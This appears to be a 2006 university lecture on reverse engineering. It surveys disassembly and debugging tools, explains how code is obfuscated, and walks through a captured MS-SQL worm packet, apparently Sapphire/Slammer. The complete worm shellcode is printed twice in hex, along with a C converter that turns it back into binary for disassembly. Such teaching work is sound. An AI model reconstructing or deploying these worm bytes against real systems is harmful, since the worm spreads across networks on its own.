Decompilation / Reverse Engineering
CS 493/693 Lecture,
Dr. Lawlor, 2006/04/14
Tools for finding out about what's in a file include:
- ls / dir: file size, ownership, last-change date
- UNIX "file" command: guessed contents, by looking at first few bytes
- ASCII dump tools, like UNIX "strings" command (find ASCII-like strings) and text editors
- Binary file display tools, like my Linux file_display tool.
- Hex dump tools, like UNIX "od" (try "od -A x -t x1 myFile.bin | less" to get a hex dump), or the excellent Windows XVI32, which is also a hex editor.
Executable code disassembly tools include:
- UNIX "ldd" will dump dynamic library information about a program.
- UNIX "objdump -drC myFile.bin" will disassemble valid executables, and "objdump -R myFile.bin" will list the dynamic relocation entries, which name the subroutines loaded from dynamic libraries.
- "ndisasm -u myFile.bin" will disassemble *any* file as 32-bit x86 code, even ASCII
text. The disassembly is bogus if the input isn't actually machine code,
though.
- Boomerang is a not-quite-functional free decompiler,
theoretically taking a binary and spitting out C code. Excellent
decompilers exist for bytecode languages like .NET and Java, but they are
still primitive for real compiled code. Even when they work
properly, decompilers spit out uncommented spaghetti code with bogus
variable names, so take the output with a grain of salt. There's a good summary of reverse engineering technology at backerstreet.
- Any decent debugger includes a disassembly tool. In particular,
the UNIX debugger GDB can be run on any piece of compiled code, even
without source or debugging information, and still:
- Set breakpoints at an address with "break *0x0804e17a" (note the silly star)
- Show registers with "info registers"
- Disassemble starting at an address with "disassemble 0x804e17a" (or "x/20i 0x804e17a" to list 20 instructions when there are no function symbols)
- Dump memory to a raw binary file with "dump memory myFile.bin 0x804e17a 0x804efff"
- This can be useful to grab a malicious program's data
"in-flight", even if it's encrypted or somehow obfuscated while on disk
or on the network.
Executable code can be obfuscated in a variety of ways:
- The classic way is to "encrypt" by XORing the machine code with
some random value, like 0x7F. The first part of the code is a
tiny loop that decrypts the rest of the code.
- Many Trojan-horse programs now use some variant of the UPX executable packer to hide their contents.
You can generate your own disassembly by starting with a packet trace:
[**] MS-SQL Worm propagation attempt [**]
03/05-22:53:11.590537 0:7:84:B8:3:FC -> 0:11:85:82:46:CC type:0x800 len:0x1A2
222.144.66.194:1031 -> 137.229.25.215:1434 UDP TTL:108 TOS:0x0 ID:23862 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA .E.P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Now use a text editor to clip off the header lines and the ASCII column, leaving only the hex (nedit's rectangular control-select is really useful here):
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50
8B 45 AC 50 FF D6 EB CA
Now use a little program like this to convert the hex to a binary file,
run as "converter < packet.hex > packet.bin":
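#include <stdio.h>
int main(void) {
  unsigned int i; /* scanf's %x conversion stores into an unsigned int */
  /* Read whitespace-separated hex bytes until EOF or a non-hex token */
  while (1==scanf("%2x",&i)) {
    unsigned char c=(unsigned char)i;
    fwrite(&c,1,1,stdout); /* emit the raw byte */
  }
  return 0;
}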
You can now disassemble the binary file with any disassembler, like "ndisasm -u packet.bin".
Check out this disassembly of the Sapphire worm, like the one
we looked over in class.